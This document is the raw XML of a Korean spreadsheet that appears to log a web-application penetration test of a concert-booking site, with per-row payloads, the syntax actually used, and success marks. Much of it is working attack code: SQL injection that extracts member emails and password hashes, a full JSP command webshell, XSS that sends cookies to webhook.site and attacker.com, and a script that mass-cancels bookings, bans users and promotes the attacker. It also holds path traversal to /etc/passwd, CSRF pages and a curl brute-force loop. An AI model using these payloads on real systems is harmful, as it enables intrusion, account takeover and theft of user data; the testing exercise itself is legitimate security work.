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추가 공격 방법 제안" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="공격 매트릭스" sheetId="2" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="1" name="_xlnm._FilterDatabase">'공격 매트릭스'!$A$2:$K$36</definedName>
  </definedNames>
  <calcPr/>
  <extLst>
    <ext uri="GoogleSheetsCustomDataVersion2">
      <go:sheetsCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId6" roundtripDataChecksum="1nw92eEtx1iWFm6hvD9s/vto7x2mVPlLnIOdgzYOS+0="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="354" uniqueCount="226">
  <si>
    <t>추가 검토 권장 공격 기법</t>
  </si>
  <si>
    <t>카테고리</t>
  </si>
  <si>
    <t>공격 기법</t>
  </si>
  <si>
    <t>설명 / 포인트</t>
  </si>
  <si>
    <t>적용 표면</t>
  </si>
  <si>
    <t>HTTP 헤더 인젝션</t>
  </si>
  <si>
    <t>Host Header Injection</t>
  </si>
  <si>
    <t>Host: evil.com → 비밀번호 재설정 링크 위조, 캐시 포이즈닝</t>
  </si>
  <si>
    <t>로그인 / 비밀번호 재설정</t>
  </si>
  <si>
    <t>X-Forwarded-For 위조</t>
  </si>
  <si>
    <t>X-Forwarded-For: 127.0.0.1 → IP 화이트리스트 우회</t>
  </si>
  <si>
    <t>관리자 페이지 / API</t>
  </si>
  <si>
    <t>비즈니스 로직</t>
  </si>
  <si>
    <t>Race Condition (경쟁 조건)</t>
  </si>
  <si>
    <t>동시 요청으로 매진 우회, 포인트 중복 적립, 쿠폰 중복 사용</t>
  </si>
  <si>
    <t>콘서트 예매 / 결제</t>
  </si>
  <si>
    <t>음수/경계값 변조</t>
  </si>
  <si>
    <t>qty=-1, price=0, amount=-99999 등 서버 검증 미비 확인</t>
  </si>
  <si>
    <t>예매 / 결제 파라미터</t>
  </si>
  <si>
    <t>인증·인가</t>
  </si>
  <si>
    <t>JWT 변조 (alg:none / 키 혼동)</t>
  </si>
  <si>
    <t>alg:"none" 또는 HS256→RS256 키 혼동으로 서명 검증 우회</t>
  </si>
  <si>
    <t>JWT 발급 엔드포인트</t>
  </si>
  <si>
    <t>비밀번호 재설정 토큰 예측</t>
  </si>
  <si>
    <t>토큰 엔트로피 부족 시 brute-force 또는 타이밍 공격</t>
  </si>
  <si>
    <t>비밀번호 재설정</t>
  </si>
  <si>
    <t>계정 열거 (Account Enumeration)</t>
  </si>
  <si>
    <t>로그인/회원가입 응답 차이로 유효 계정 식별</t>
  </si>
  <si>
    <t>로그인 / 회원가입</t>
  </si>
  <si>
    <t>파일 처리</t>
  </si>
  <si>
    <t>MIME 스니핑 / 확장자 이중 우회</t>
  </si>
  <si>
    <t>shell.jsp.jpg, shell.jsp%00.jpg 등 필터 우회</t>
  </si>
  <si>
    <t>파일 업로드 전 기능</t>
  </si>
  <si>
    <t>대용량 파일 DoS</t>
  </si>
  <si>
    <t>수백 MB 파일 업로드로 서버 자원 소모</t>
  </si>
  <si>
    <t>파일 업로드 기능</t>
  </si>
  <si>
    <t>서버 측</t>
  </si>
  <si>
    <t>SSRF (Server-Side Request Forgery)</t>
  </si>
  <si>
    <t>url= 파라미터로 내부망(127.0.0.1, 169.254.x.x) 요청 유도</t>
  </si>
  <si>
    <t>외부 URL 처리 기능</t>
  </si>
  <si>
    <t>XXE (XML External Entity)</t>
  </si>
  <si>
    <t>XML 파싱 시 외부 엔티티 참조로 파일 읽기/SSRF</t>
  </si>
  <si>
    <t>XML 파싱 엔드포인트</t>
  </si>
  <si>
    <t>SSTI (서버 사이드 템플릿 인젝션)</t>
  </si>
  <si>
    <t>{{7*7}} → 49 출력 확인 → RCE 시도</t>
  </si>
  <si>
    <t>검색 / 오류 메시지 렌더링</t>
  </si>
  <si>
    <t>클라이언트</t>
  </si>
  <si>
    <t>DOM-based XSS</t>
  </si>
  <si>
    <t>location.hash, document.referrer 등 JS 소스로 직접 innerHTML 삽입</t>
  </si>
  <si>
    <t>SPA 라우팅 파라미터</t>
  </si>
  <si>
    <t>Clickjacking</t>
  </si>
  <si>
    <t>X-Frame-Options 미설정 → iframe으로 UI 위장 클릭 유도</t>
  </si>
  <si>
    <t>전체 페이지</t>
  </si>
  <si>
    <t>오픈 리다이렉트</t>
  </si>
  <si>
    <t>?redirect=http://phishing.com → 피싱 연계</t>
  </si>
  <si>
    <t>로그인 후 redirect 파라미터</t>
  </si>
  <si>
    <t>정보 노출</t>
  </si>
  <si>
    <t>디렉토리 리스팅</t>
  </si>
  <si>
    <t>/uploads/, /static/ 등 웹 루트 직접 접근으로 파일 목록 노출</t>
  </si>
  <si>
    <t>정적 파일 서버</t>
  </si>
  <si>
    <t>스택 트레이스 / 상세 에러 노출</t>
  </si>
  <si>
    <t>예외 발생 시 DB 쿼리·내부 경로 노출 여부 확인</t>
  </si>
  <si>
    <t>모든 입력 파라미터</t>
  </si>
  <si>
    <t>소스코드·백업 파일 노출</t>
  </si>
  <si>
    <t>/.git/, /backup.zip, /WEB-INF/web.xml 직접 요청</t>
  </si>
  <si>
    <t>웹 루트 공개 경로</t>
  </si>
  <si>
    <t>WAS 공격 표면 테스트 매트릭스</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>공격 표면</t>
  </si>
  <si>
    <t>공격 방법</t>
  </si>
  <si>
    <t>예시 페이로드</t>
  </si>
  <si>
    <t>대상 파라미터/엔드포인트</t>
  </si>
  <si>
    <t>성공 여부
(O / X / △)</t>
  </si>
  <si>
    <t>HTTP 상태코드</t>
  </si>
  <si>
    <t>실제 사용 구문</t>
  </si>
  <si>
    <t>증거 (스크린샷 등)</t>
  </si>
  <si>
    <t>공격시간</t>
  </si>
  <si>
    <t>QNA</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>UNION-based SQLi</t>
  </si>
  <si>
    <t>' UNION SELECT NULL,NULL,NULL--</t>
  </si>
  <si>
    <t>제목·본문 검색, id 파라미터</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>test' UNION SELECT null,EMAIL,NAME,null FROM MEMBERS--</t>
  </si>
  <si>
    <t>노션 참고</t>
  </si>
  <si>
    <t>Error-based SQLi</t>
  </si>
  <si>
    <t>' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--</t>
  </si>
  <si>
    <t>검색 파라미터</t>
  </si>
  <si>
    <t>X</t>
  </si>
  <si>
    <t>test' AND UpdateXML(1, CONCAT(0x3a, (SELECT @@version)), 1)--</t>
  </si>
  <si>
    <t>Boolean Blind SQLi</t>
  </si>
  <si>
    <t>' AND 1=1-- / ' AND 1=2--</t>
  </si>
  <si>
    <t xml:space="preserve">test' AND 1=1--, test' AND 1=2--  </t>
  </si>
  <si>
    <t>Time-based Blind SQLi</t>
  </si>
  <si>
    <t>'; IF(1=1,SLEEP(5),0)--</t>
  </si>
  <si>
    <t>test' AND 1 = (CASE WHEN (SUBSTR((SELECT EMAIL FROM MEMBERS WHERE ROWNUM = 1), 1, 1) = 'a') THEN (SELECT 1 FROM (SELECT ROWNUM FROM all_objects WHERE ROWNUM &lt;= 200) a, (SELECT ROWNUM FROM all_objects WHERE ROWNUM &lt;= 200) b, (SELECT ROWNUM FROM all_objects WHERE ROWNUM &lt;= 200) c WHERE ROWNUM = 1) ELSE 1 END)--</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>Stored XSS</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>글 제목 / 본문 입력</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>CSRF</t>
  </si>
  <si>
    <t>CSRF (상태 변경 요청)</t>
  </si>
  <si>
    <t>&lt;form action='/qna/delete' method='POST'&gt;&lt;input name='id' value='1'&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>게시글</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="11.0"/>
      </rPr>
      <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body onload="document.forms[0].submit()"&gt;
  &lt;form action="</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://yanus</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="11.0"/>
      </rPr>
      <t>.com/qna/insertQna.do"
        method="POST" enctype="multipart/form-data"&gt;
    &lt;input type="hidden" name="QNA_TITLE"    value="CSRF로 작성된 글"&gt;
    &lt;input type="hidden" name="QNA_CONTENT"  value="피해자 모르게 등록되었습니다."&gt;
    &lt;input type="hidden" name="QNA_CATEGORY" value="66"&gt;
    &lt;input type="hidden" name="QNA_SECRET"   value="0"&gt;
  &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
    </r>
  </si>
  <si>
    <t>2026. 6. 4 오후 4:08:21 공격 시도
2026. 6. 4 오후 4:09:22 관리자로 공격 당한 시각(POST 요청 QNA 글 작성한 시각)</t>
  </si>
  <si>
    <t>파일 업로드</t>
  </si>
  <si>
    <t>웹쉘 업로드 (.jsp/.php)</t>
  </si>
  <si>
    <t>Content-Type 위조 후 shell.jsp 업로드</t>
  </si>
  <si>
    <t>첨부파일 업로드 기능</t>
  </si>
  <si>
    <t>&lt;jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" version="2.0"&gt;
&lt;jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/&gt;
&lt;jsp:directive.page import="java.util.*"/&gt;
&lt;jsp:directive.page import="java.io.*"/&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;Webshell Console&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;form method="get" action=""&gt;
        &lt;input type="text" name="cmd" style="width:300px;" /&gt;
        &lt;input type="submit" value="Send" /&gt;
    &lt;/form&gt;
    &lt;br/&gt;
    &lt;jsp:scriptlet&gt;&lt;![CDATA[
        String tmp = pageContext.getRequest().getParameter("cmd");
        if (tmp != null &amp;&amp; !"".equals(tmp)) {
            try {
                out.println("Command: " + tmp + "&lt;br/&gt;&lt;br/&gt;");
                Process p = Runtime.getRuntime().exec(tmp);
                InputStream in = p.getInputStream();
                BufferedReader br = new BufferedReader(new InputStreamReader(in, "GBK"));
                String brs = br.readLine();
                while (brs != null) {
                    out.println(brs + "&lt;br/&gt;");
                    brs = br.readLine();
                }
                br.close();
            } catch (Exception ex) {
                out.println(ex.toString());
            }
        }
    ]]&gt;&lt;/jsp:scriptlet&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;/jsp:root&gt;</t>
  </si>
  <si>
    <t>파일 다운로드</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t xml:space="preserve">GET /qna/downloadFile.do?fileName=../../../../../../../../../../Windows/win.ini
</t>
  </si>
  <si>
    <t>file= / filename= 파라미터</t>
  </si>
  <si>
    <t>GET /qna/downloadFile.do?fileName=../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>IDOR</t>
  </si>
  <si>
    <t>직접 객체 참조</t>
  </si>
  <si>
    <t>id=1 → id=2 (타인 글 열람/수정)</t>
  </si>
  <si>
    <t>id= 파라미터</t>
  </si>
  <si>
    <t>△</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="10.0"/>
        <u/>
      </rPr>
      <t>http://localhost:8080/qna/openQnaDetail.do?qna_id=2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t xml:space="preserve"> (다만 비밀글은 못 읽음)</t>
    </r>
  </si>
  <si>
    <t>콘서트 예매/결제 페이지</t>
  </si>
  <si>
    <t>파라미터 변조</t>
  </si>
  <si>
    <t>가격·스케줄 변조</t>
  </si>
  <si>
    <t xml:space="preserve">amount=100000 → amount=1 | scheduleId=15 → scheduleId=1 </t>
  </si>
  <si>
    <t>amount / scheduleId POST 파라미터</t>
  </si>
  <si>
    <t>POST /payment/result.do의 amount 파라미터 변조 | POST /bookingCreate.do의 scheduleId 파라미터 변조</t>
  </si>
  <si>
    <t>X(탐지 불가)</t>
  </si>
  <si>
    <t>콘서트 목록 페이지</t>
  </si>
  <si>
    <t>UNION SELECT 1,email,password_hash,role,NULL,'x',NULL,NULL,NULL,NULL,1 FROM members --</t>
  </si>
  <si>
    <t>콘서트 검색 status= 파라미터</t>
  </si>
  <si>
    <t>URL → /concert/list.do?keyword=bts&amp;status=x' GROUP BY c.concert_id,c.title,c.artist,c.venue,c.thumbnail,c.status UNION SELECT 1,email,password_hash,role,NULL,'x',NULL,NULL,NULL,NULL,1 FROM members --</t>
  </si>
  <si>
    <t>1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual))</t>
  </si>
  <si>
    <t>URL → /concert/list.do?keyword=bts&amp;status=x' AND 1=CTXSYS.DRITHSX.SN(1,(서브쿼리)) AND 'x'='x
→ 예시) /concert/list.do?keyword=bts&amp;status=x' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT user FROM dual)) AND 'x'='x</t>
  </si>
  <si>
    <t>(SELECT COUNT(*) FROM members) &gt; 0</t>
  </si>
  <si>
    <t>콘서트 검색 keyword= 파라미터 (=공연 검색창)</t>
  </si>
  <si>
    <t xml:space="preserve">검색창 → xyz') 조사논리문 OR ('1'='1 
→ 예시) xyz') OR (SELECT COUNT(*) FROM members) &gt; 0 OR ('1'='1 </t>
  </si>
  <si>
    <t>Reflected XSS</t>
  </si>
  <si>
    <t>"&gt;&lt;img src=x onerror="fetch('공격자웹훅서버주소/c?k='+document.cookie)"&gt;</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="11.0"/>
      </rPr>
      <t>검색창 → "&gt;&lt;img src=x onerror="fetch('공격자웹훅서버주소/c?k='+document.cookie)"&gt;
→ 예시) "&gt;&lt;img src=x onerror="fetch('</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>https://webhook.site/f3dfcf93-e8fd-400c-9085-957a3f04beb1/c?k=</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="11.0"/>
      </rPr>
      <t>'+document.cookie)"&gt;</t>
    </r>
  </si>
  <si>
    <t>2026. 6. 4 오후 4:27:56
→ Splunk에서 SQli로 뜸</t>
  </si>
  <si>
    <t>세션 하이재킹</t>
  </si>
  <si>
    <t>Reflected XSS 이후 세션 하이재킹</t>
  </si>
  <si>
    <t>Reflected XSS로 탈취한 JESSIONID 변조</t>
  </si>
  <si>
    <t>HTTP 헤더의 Cookie: JSESSIONID=</t>
  </si>
  <si>
    <t>웹훅으로 탈취한 JESSIONID을 통해, Burp Suite 등으로 HTTP 요청 메시지를 인터셉트한 후 쿠키 변조하고 전송</t>
  </si>
  <si>
    <t>클릭재킹</t>
  </si>
  <si>
    <t>iframe 삽입</t>
  </si>
  <si>
    <t>눈속임 피싱사이트 HTML을 iframe으로 삽입하여 위험한 버튼 클릭 유도</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;script&gt;(async()=&gt;{
const A='admin999@naver.com';
/* 1) 정상 공연목록을 즉시 전체화면 오버레이 → 빈 검색결과 은폐 */
const f=document.createElement('iframe');
f.src='/concert/list.do';
f.setAttribute('style','position:fixed;inset:0;width:100vw;height:100vh;border:0;z-index:2147483647;background:#fff');
(document.body||document.documentElement).appendChild(f);
/* 2) 뒤에서 공격 */
const P=(u,b)=&gt;fetch(u,{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:new URLSearchParams(b),credentials:'same-origin'});
const D=async u=&gt;new DOMParser().parseFromString(await(await fetch(u,{credentials:'same-origin'})).text(),'text/html');
const bd=await D('/admin/booking/list.do?PAGE_ROW=99999');
bd.querySelectorAll('form[action="/admin/booking/cancel.do"] input[name=bookingId]').forEach(i=&gt;P('/admin/booking/cancel.do',{bookingId:i.value}));
const md=await D('/admin/member/list.do?PAGE_ROW=99999');
md.querySelectorAll('table tbody tr').forEach(tr=&gt;{const e=(tr.children[1]?.textContent||'').trim(),ban=tr.querySelector('form[action="/admin/member/ban.do"] input[name=memberId]'),pro=tr.querySelector('form[action="/admin/member/promote.do"] input[name=memberId]');if(e===A){if(pro)P('/admin/member/promote.do',{memberId:pro.value});}else if(ban)P('/admin/member/ban.do',{memberId:ban.value});});
})();&lt;/script&gt;
</t>
  </si>
  <si>
    <t>클릭재킹은 탐지가 불가능해 제외하기로 함</t>
  </si>
  <si>
    <t>2026. 6. 4 오후 4:29:19
→ Splunk에서 SQli로 뜸</t>
  </si>
  <si>
    <t>예매내역 / 마이페이지</t>
  </si>
  <si>
    <t>타인 예매 목록 열람</t>
  </si>
  <si>
    <t>memberId=6 → mmeberId=1</t>
  </si>
  <si>
    <t>memberId= URL 파라미터</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t xml:space="preserve">URl → </t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="10.0"/>
        <u/>
      </rPr>
      <t>http://localhost:8080/bookingMyList.do?memberId=</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>{memberid} &lt;- 수정</t>
    </r>
  </si>
  <si>
    <t>타인 예매 상세내역 열람</t>
  </si>
  <si>
    <t>bookingId=43 → bookingId=1</t>
  </si>
  <si>
    <t>bookingId= URL 파라미터</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t xml:space="preserve">URl → </t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="10.0"/>
        <u/>
      </rPr>
      <t>http://localhost:8080/bookingDetail.do?bookingId=</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>{bookingid}&lt;- 수정</t>
    </r>
  </si>
  <si>
    <t>UNION SELECT NULL,password,NULL FROM members --</t>
  </si>
  <si>
    <t>GET /bookingDetail.do?bookingId=48 UNION SELECT NULL,password,NULL FROM members --</t>
  </si>
  <si>
    <t>1 AND (SELECT COUNT(*) FROM memebers)&gt;0--</t>
  </si>
  <si>
    <t>GET /bookingDetail.do?bookingId=48 AND (SELECT COUNT(*) FROM members)&gt;0</t>
  </si>
  <si>
    <t>Stored XSS (프로필 정보)</t>
  </si>
  <si>
    <t>&lt;svg onload=alert('개인정보가 유출되었습니다.')&gt;</t>
  </si>
  <si>
    <t>닉네임 / 주소 입력</t>
  </si>
  <si>
    <t>회원정보 '이름' 입력창에 &lt;svg onload=alert(1)&gt; 기입 후 재로그인</t>
  </si>
  <si>
    <t>Mass Assignment</t>
  </si>
  <si>
    <t>MY 페이지의 유저 권한 상승 시도</t>
  </si>
  <si>
    <t>fetch('/my/info.do', { ~ }</t>
  </si>
  <si>
    <t>MY페이지 개발자 탭(F12) 콘솔</t>
  </si>
  <si>
    <t>fetch('/my/info.do', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'NAME=테스트&amp;PHONE=01011111111&amp;BIRTH_YEAR=2000&amp;BIRTH_MONTH=01&amp;BIRTH_DAY=01&amp;ROLE=ADMIN&amp;MEMBER_ID=1'
})
.then(r =&gt; console.log('status:', r.status, r.url))</t>
  </si>
  <si>
    <t>로그인 / 회원가입 / 관리자</t>
  </si>
  <si>
    <t>로그인 우회 (Auth Bypass)</t>
  </si>
  <si>
    <t>' OR '1'='1'--  /  admin'--</t>
  </si>
  <si>
    <t>username / password 필드</t>
  </si>
  <si>
    <t xml:space="preserve">ID + ' OR '1'='1'-- / admin + '-- </t>
  </si>
  <si>
    <t>' AND EXTRACTVALUE(1,CONCAT(0x7e,user()))--</t>
  </si>
  <si>
    <t>username 파라미터</t>
  </si>
  <si>
    <t xml:space="preserve"> AND EXTRACTVALUE(1,CONCAT(0x7e,user()))--</t>
  </si>
  <si>
    <t>' AND SUBSTRING(password,1,1)='a'--</t>
  </si>
  <si>
    <t xml:space="preserve"> AND SUBSTRING(password,1,1)='a'--</t>
  </si>
  <si>
    <t>Reflected XSS (에러 메시지)</t>
  </si>
  <si>
    <t>&lt;script&gt;location='http://attacker.com?c='+document.cookie&lt;/script&gt;</t>
  </si>
  <si>
    <t>username / redirect 파라미터</t>
  </si>
  <si>
    <t>/loginForm.do?returnUrl="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>2026.06.04 오후 5:29</t>
  </si>
  <si>
    <t>비밀번호 변경 CSRF</t>
  </si>
  <si>
    <t>&lt;img src='/user/changePassword?pw=hacked'&gt;</t>
  </si>
  <si>
    <t>비밀번호 변경 엔드포인트</t>
  </si>
  <si>
    <t>&lt;html&gt;
  &lt;body&gt;
    &lt;form action="http://yanus.com/my/delete.do" method="POST" id="f"&gt;&lt;/form&gt;
    &lt;script&gt;document.getElementById('f').submit();&lt;/script&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>관리자 계정 무차별 대입</t>
  </si>
  <si>
    <t>admin / password, admin / admin123 ...</t>
  </si>
  <si>
    <t>/admin 로그인</t>
  </si>
  <si>
    <t>방법 A — Kali에서 직접 실행 (제일 정석)
ssh -i ~/.ssh/kali_tunnel kali@100.85.203.66
접속 후 Kali에서:
for p in admin admin123 password 1234 qwerty 'qwer1234!'; do
  curl -s -o /dev/null -w "%{http_code}  $p\n" "http://yanus.com/loginAction.do" \
    --data-urlencode "MEMBER_ID=tmdwns@naver.com" --data-urlencode "MEMBER_PASSWD=$p"
done
방법 B — Windows에서 SOCKS 경유 (PowerShell)
$pws = "admin","admin123","password","1234","qwerty","a123456789@"
foreach ($p in $pws) {
  curl.exe -s -o NUL -w "%{http_code}  $p`n" --socks5-hostname 127.0.0.1:1080 `
    "http://yanus.com/loginAction.do" `
    --data-urlencode "MEMBER_ID=tmdwns@naver.com" --data-urlencode "MEMBER_PASSWD=$p"
}</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>세션 공격</t>
  </si>
  <si>
    <t>세션 고정 (Session Fixation)</t>
  </si>
  <si>
    <t>로그인 전 JSESSIONID 고정 후 로그인 유도</t>
  </si>
  <si>
    <t>로그인 세션 흐름</t>
  </si>
  <si>
    <t>200/302</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>curl -c c.txt -i "http://localhost:8080/loginForm.do" | findstr /i set-cookie   /    curl -b c.txt -c c.txt -i "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="10.0"/>
        <u/>
      </rPr>
      <t>http://localhost:8080/loginAction.do</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>" ^
  --data-urlencode "MEMBER_ID=victim@test.com" --data-urlencode "MEMBER_PASSWD=Pass1234!" | findstr /i set-cookie</t>
    </r>
  </si>
  <si>
    <t>2026.06.04 오후 5:47</t>
  </si>
  <si>
    <t>세션 하이재킹 (XSS 연계)</t>
  </si>
  <si>
    <t>XSS로 document.cookie 탈취 → 세션 재사용</t>
  </si>
  <si>
    <t>쿠키 / 세션 토큰</t>
  </si>
  <si>
    <t>http://localhost:8080/loginForm.do?returnUrl="&gt;&lt;script&gt;new Image().src='http://localhost:8000/c?'+document.cookie&lt;/script&gt;</t>
  </si>
  <si>
    <t>권한 상승</t>
  </si>
  <si>
    <t>수평·수직 권한 상승</t>
  </si>
  <si>
    <t>일반 user 토큰으로 /admin/* 직접 접근</t>
  </si>
  <si>
    <t>/admin 경로 파라미터</t>
  </si>
  <si>
    <t>/main.do?deny=admin , /bookingDetail.do?bookingId=숫자</t>
  </si>
  <si>
    <t>피싱 연계 리다이렉트</t>
  </si>
  <si>
    <t>?redirect=http://evil.com</t>
  </si>
  <si>
    <t>redirect / returnUrl 파라미터</t>
  </si>
  <si>
    <t>/loginForm.do?returnUrl=</t>
  </si>
  <si>
    <t>회원가입</t>
  </si>
  <si>
    <t>관리자 role 직접 삽입</t>
  </si>
  <si>
    <t>role=ADMIN 파라미터 추가</t>
  </si>
  <si>
    <t>회원가입 POST body</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>curl "</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <color rgb="FF1155CC"/>
        <sz val="10.0"/>
        <u/>
      </rPr>
      <t>http://localhost:8080/joinAction.do</t>
    </r>
    <r>
      <rPr>
        <rFont val="Malgun Gothic"/>
        <sz val="10.0"/>
      </rPr>
      <t>" \
  --data-urlencode "MEMBER_NAME=해커" --data-urlencode "MEMBER_ID=tmdwns@naver.com" \
  --data-urlencode "MEMBER_EMAIL=hack@test.com" --data-urlencode "MEMBER_PASSWD=a123456789@" \
  --data-urlencode "MEMBER_PHONE=01099998888" \
  --data-urlencode "role=ADMIN" --data-urlencode "MEMBER_GRADE=ADMIN"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</si>
</sst>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-dd am/pm h:mm:ss"/>
    <numFmt numFmtId="165" formatCode="yyyy. m. d am/pm h:mm:ss"/>
    <numFmt numFmtId="166" formatCode="yyyy-mm-dd h:mm:ss"/>
    <numFmt numFmtId="167" formatCode="yyyy-mm-dd h:mm"/>
  </numFmts>
  <fonts count="17">
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font/>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <b/>
      <sz val="10.0"/>
      <color rgb="FF1F3864"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color theme="1"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <b/>
      <sz val="10.0"/>
      <color theme="1"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF1F3864"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <u/>
      <sz val="10.0"/>
      <color rgb="FF0000FF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF3C444D"/>
      <name val="&quot;Splunk Platform Mono&quot;"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <u/>
      <sz val="10.0"/>
      <color rgb="FF0000FF"/>
      <name val="Malgun Gothic"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="10.0"/>
      <color rgb="FF0000FF"/>
      <name val="Malgun Gothic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BDD7EE"/>
        <bgColor rgb="FFBDD7EE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</fills>
  <borders count="5">
    <border/>
    <border>
      <left style="thin">
        <color rgb="FFA0A0A0"/>
      </left>
      <top style="thin">
        <color rgb="FFA0A0A0"/>
      </top>
      <bottom style="thin">
        <color rgb="FFA0A0A0"/>
      </bottom>
    </border>
    <border>
      <top style="thin">
        <color rgb="FFA0A0A0"/>
      </top>
      <bottom style="thin">
        <color rgb="FFA0A0A0"/>
      </bottom>
    </border>
    <border>
      <right style="thin">
        <color rgb="FFA0A0A0"/>
      </right>
      <top style="thin">
        <color rgb="FFA0A0A0"/>
      </top>
      <bottom style="thin">
        <color rgb="FFA0A0A0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ont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="4" fillId="6" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="4" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="4" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
